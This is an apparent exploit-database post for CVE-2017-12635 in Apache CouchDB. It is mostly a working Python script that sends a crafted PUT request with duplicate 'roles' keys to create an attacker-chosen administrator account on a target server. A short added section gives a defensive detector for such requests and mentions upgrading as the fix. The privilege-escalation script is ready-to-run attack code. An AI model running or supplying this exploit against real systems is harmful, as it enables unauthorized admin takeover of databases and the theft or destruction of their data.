Apache CouchDB 1.7.0 and 2.x before 2.1.1 - Remote Privilege Escalation
Source: @r4wd3r  Author: r4wd3r  Published: 2018-04-24
# Exploit Title: Apache CouchDB JSON 1.7.0 and 2.x before 2.1.1 - Remote Privilege Escalation
# Date: 2017-08-07
# Exploit Author: Sebastián Castro @r4wd3r
# Vendor Homepage: https://blog.couchdb.org/2017/11/14/apache-couchdb-cve-2017-12635-and-cve-2017-12636/
# Software Link: http://couchdb.apache.org/
# Version: Apache CouchDB 1.7.0 and 2.x before 2.1.1
# CVE : CVE-2017-12635
 
#!/usr/bin/env python
 
import argparse
import re
import sys
import requests
 
parser = argparse.ArgumentParser(
    description='Exploits the Apache CouchDB JSON Remote Privilege Escalation Vulnerability' +
    ' (CVE-2017-12635)')
parser.add_argument('host', help='Host to attack.', type=str)
parser.add_argument('-p', '--port', help='Port of CouchDB Service', type=str, default='5984')
parser.add_argument('-u', '--user', help='Username to create as admin.',
                    type=str, default='couchara')
parser.add_argument('-P', '--password', help='Password of the created user.',
                    type=str, default='couchapass')
args = parser.parse_args()
 
host = args.host
port = args.port
user = args.user
password = args.password
 
pat_ip = re.compile(r"^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$")
if not pat_ip.match(host):
    print "[x] Wrong host. Must be a valid IP address."
    sys.exit(1)
 
print "[+] User to create: " + user
print "[+] Password: " + password
print "[+] Attacking host " + host + " on port " + port
 
url = 'http://' + host + ':' + port
 
try:
    rtest = requests.get(url, timeout=10)
except requests.exceptions.Timeout:
    print "[x] Server is taking too long to answer. Exiting."
    sys.exit(1)
except requests.ConnectionError:
    print "[x] Unable to connect to the remote host."
    sys.exit(1)
 
# Payload for creating user
cu_url_payload = url + "/_users/org.couchdb.user:" + user
cu_data_payload = '{"type": "user", "name": "'+user+'", "roles": ["_admin"], "roles": [], "password": "'+password+'"}'
 
try:
    rcu = requests.put(cu_url_payload, data=cu_data_payload)
except requests.exceptions.HTTPError:
    print "[x] ERROR: Unable to create the user on remote host."
    sys.exit(1)
 
if rcu.status_code == 201:
    print "[+] User " + user + " with password " + password + " successfully created."
    sys.exit(0)
else:
    # status_code is an int, so it must be converted before concatenation
    print "[x] ERROR " + str(rcu.status_code) + ": Unable to create the user on remote host."
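
The request body above repeats the `roles` key inside one JSON object, and JSON parsers do not agree on which occurrence wins. As a detection aid, the following added example (not part of the original post; `inspect_user_put` and the sample requests are hypothetical names and constructed data) flags PUT requests to `/_users/org.couchdb.user:*` whose body has duplicate keys or asks for `_admin` in any `roles` occurrence.

```python
import json

USER_DOC_PREFIX = "/_users/org.couchdb.user:"
ADMIN_ROLE = "_admin"


def inspect_user_put(method, path, body):
    """Return findings for one HTTP request; an empty list means clean."""
    if method.upper() != "PUT" or not path.startswith(USER_DOC_PREFIX):
        return []
    dupes, role_values = set(), []

    def hook(pairs):
        # json.loads calls this for every object with ALL key/value pairs,
        # before the usual "last one wins" collapse hides the repeats.
        keys = [k for k, _ in pairs]
        dupes.update(k for k in keys if keys.count(k) > 1)
        role_values.extend(v for k, v in pairs if k == "roles")
        return dict(pairs)

    try:
        json.loads(body, object_pairs_hook=hook)
    except ValueError:
        return ["unparseable JSON body"]
    findings = ["duplicate key: %s" % k for k in sorted(dupes)]
    # Check every occurrence of "roles", not just the surviving one.
    if any(isinstance(v, list) and ADMIN_ROLE in v for v in role_values):
        findings.append("_admin requested in a roles array")
    return findings


# Constructed sample requests (method, path, body); not captured traffic.
SAMPLES = [
    ("PUT", USER_DOC_PREFIX + "alice",
     '{"type": "user", "name": "alice", "roles": ["_admin"], '
     '"roles": [], "password": "x"}'),
    ("PUT", USER_DOC_PREFIX + "bob",
     '{"type": "user", "name": "bob", "roles": [], "password": "x"}'),
    ("GET", "/_users/_all_docs", ""),
]

if __name__ == "__main__":
    for method, path, body in SAMPLES:
        print(method, path, inspect_user_put(method, path, body) or "clean")
```

The same check can run in a reverse proxy or over logged request bodies; upgrading past the affected versions listed in the header remains the actual fix.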
 